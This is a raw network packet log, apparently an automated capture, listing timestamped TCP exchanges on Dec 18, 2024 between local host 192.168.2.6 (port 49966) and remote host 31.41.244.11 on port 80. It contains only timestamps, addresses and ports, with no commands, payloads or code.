                                                                                                                                                                  Dec 18, 2024 11:09:46.134690046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.135370970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.135416031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.136609077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.136729002 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.137521029 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.137567997 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.138609886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.138658047 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.138752937 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.138814926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.140628099 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.140671968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.140767097 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.140835047 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.142810106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.142849922 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.143388033 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.143434048 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.144906998 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.144978046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.145112991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.145159006 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.147110939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.147121906 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.147155046 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.149307013 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.149317980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.149362087 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.151076078 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.151087999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.151124954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.152887106 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.152981043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.153635979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.153918982 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.154872894 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.154926062 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.155355930 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.155416012 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.157044888 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.157109976 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.157963037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.158094883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.158993959 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.159003019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.159040928 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.244651079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.244735003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.244982004 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.245063066 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.245703936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.245716095 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.245755911 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.247354031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.247513056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.247531891 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.247580051 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.249999046 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.250015020 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.250026941 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.250045061 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.250052929 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.250085115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.251399994 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.251446962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.251609087 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.251787901 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.253909111 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.253923893 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.253978968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.254648924 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.254662991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.254713058 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.254731894 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.256345987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.256352901 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.256398916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.257755995 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.257808924 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.258225918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.258266926 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.258955956 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.259038925 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.259140968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.259183884 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.261266947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.261282921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.261329889 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.261343002 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.262455940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.262476921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.262515068 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.263509989 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.263578892 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.265064001 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.265075922 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.265086889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.265114069 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.265141010 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.267529964 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.267544031 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.267621040 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.268126965 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.268138885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.268172979 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.268198967 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.270530939 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.270543098 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.270555019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.270565033 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.270572901 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.270606041 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.273390055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.273402929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.273413897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.273425102 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.273446083 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.273463011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.275527954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.275541067 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.275607109 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.277576923 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.277589083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.277601004 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.277612925 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.277635098 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.277656078 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.279520035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.279526949 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.279566050 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.280814886 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.280827045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.280867100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.281527996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.281728029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.281899929 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.282448053 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.282459974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.282500029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.282538891 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.285387039 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.285398960 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.285408974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.285418987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.285446882 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.285482883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.287405014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.287417889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.287460089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.287484884 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.288880110 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.288891077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.288908005 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.288918018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.288944960 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.288974047 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.290476084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.290487051 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.290528059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.291599035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.291666031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.294128895 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.294138908 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.294147968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.294159889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.294178963 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.294207096 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.294629097 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.294667959 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.297326088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.297360897 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.297375917 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.297394991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.297405005 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.297430038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.297437906 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.297473907 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.299303055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.299355030 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.299365044 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.299388885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.299398899 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.299422979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.299431086 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.299519062 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.300627947 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.300662994 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.300685883 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.300708055 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.302454948 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.302489042 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.302512884 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.302535057 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.303409100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.303461075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.303466082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.303507090 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.304610968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.304658890 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.304922104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.304976940 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.305989981 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.306127071 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.307424068 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.307459116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.307495117 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.307513952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.307544947 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.309587002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.309622049 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.309648991 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.309654951 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.309670925 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.309689045 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.309698105 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.309732914 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.311431885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.311466932 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.311485052 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.311500072 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.313743114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.313776970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.313808918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.313812971 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.313823938 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.313894987 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.314059973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.314229965 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.314713955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.314762115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.315080881 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.315124989 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.319505930 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.319555044 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.435213089 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.435261011 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.435297012 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.435338974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.435539961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.435575962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.435605049 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.435622931 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.436275959 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.436357021 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.436650991 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.436708927 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.437378883 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.437434912 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.437510967 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.437561989 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.438445091 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.438498974 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.439197063 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.439259052 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.439450979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.439486027 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.439502954 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.439528942 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.441454887 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.441488981 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.441507101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.441524982 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.441525936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.441561937 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.441562891 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.441597939 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.443538904 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.443573952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.443608999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.443620920 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.443662882 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.444504976 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.444549084 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.444562912 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.444602966 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.444605112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.444639921 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.447405100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447451115 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447475910 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.447488070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447515011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.447539091 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.447577000 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447623968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.447863102 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447875023 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.447921038 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.448599100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.448631048 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.448641062 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.448668003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.450794935 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.450807095 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.450819016 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.450830936 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.450849056 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.450880051 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.453491926 CET804996631.41.244.11192.168.2.6
